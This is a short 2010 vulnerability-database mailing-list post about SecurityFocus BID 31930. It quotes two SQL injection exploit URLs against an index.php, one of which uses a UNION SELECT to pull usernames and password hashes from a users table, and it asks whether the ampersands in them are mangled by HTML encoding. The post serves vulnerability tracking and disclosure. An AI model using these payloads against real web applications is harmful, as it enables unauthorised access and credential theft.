[VIM] BID 31930 exploit
security curmudgeon
jericho at attrition.org
Thu Nov 18 04:10:36 CST 2010
http://www.securityfocus.com/bid/31930/exploit
http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL
SELECT 0,0,0,0,0,version()--
--
Just want to confirm, it appears the "&" is actually some HTML
decoding snafu that is essentially doing & and an encoded &? seems like
that should be "&nid=" in the first example and "&cpage" in the second?
More information about the VIM
mailing list